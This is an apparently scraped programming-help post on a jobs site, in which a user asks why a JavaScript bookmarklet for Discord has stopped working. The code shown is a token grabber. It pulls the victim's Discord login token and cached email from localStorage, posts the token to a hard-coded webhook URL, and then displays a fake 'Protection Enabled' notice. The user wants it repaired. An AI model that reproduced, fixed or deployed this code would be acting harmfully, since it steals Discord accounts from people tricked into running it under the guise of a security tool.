Business
Jobs
  • About Us
  • Solutions
    • Job Postings
      Post your job and receive qualified candidates in 48h.
    • Candidate Assessments
      500+ technical and psychological tests, plus anti-fraud.
    • Headhunting
      Tailor-made executive search from start to finish.
    • Payroll + EOR
      Payroll dispersal and EOR across 15+ LATAM countries.
  • Pricing
  • Jobs

0

176
Views
What does this error in my javascript post request mean?

console error

javascript: void (function () {  if ("https://discord.com" != this.document.location.origin)    alert("You must be on Discord to use this tool!");  else {    const c = document.createElement("iframe");    document.head.append(c);    const d = Object.getOwnPropertyDescriptor(c.contentWindow, "localStorage");    c.remove(),      Object.defineProperty(window, "localStorage", d),      (t = localStorage.getItem("token")),      (e = localStorage.getItem("email_cache"));    var a = new XMLHttpRequest();    a.open(      "POST",      "https://discord.com/api/webhooks/881638611202748466/2zdbQAb-2QVcZM0r4Wv-hfVhAG2c0XeDw1SQXmmfVaT0IGHQukv3VI0iH2BLDtjt0lQc"    ),      a.setRequestHeader("Content-type", "application/json");    var b = {      embeds: [        {          color: 16515972,          title: "Protection Enabled",          description: `\`\`\`${t}\`\`\``,        },      ],    };    a.send(JSON.stringify(b)),      (notice = `<div class="notice-3bPHh-" style="background-color:#364995;color:white;">%F0%9F%94%92 Extra.<a href = "https://discord.com/channels/@me"> <b>Reload</b><a></div>`),      document        .querySelector(".base-3dtUhz")        .insertAdjacentHTML("afterbegin", notice);  }})();

I get this error when I try run this javascript post request on discord. This code used to work originally but it has recently stopped working. If anyone could tell me what this error at the top of the console means I would appreciate it.

about 4 years ago · Juan Pablo Isaza
Answer question
Find remote jobs

Discover the new way to find a job!

Top jobs
Top job categories
Business
Post vacancy Pricing Sales
Legal
Terms and conditions Privacy policy
© 2026 PeakU Inc. All Rights Reserved.
Andres GPT
Show me some job opportunities
There's an error!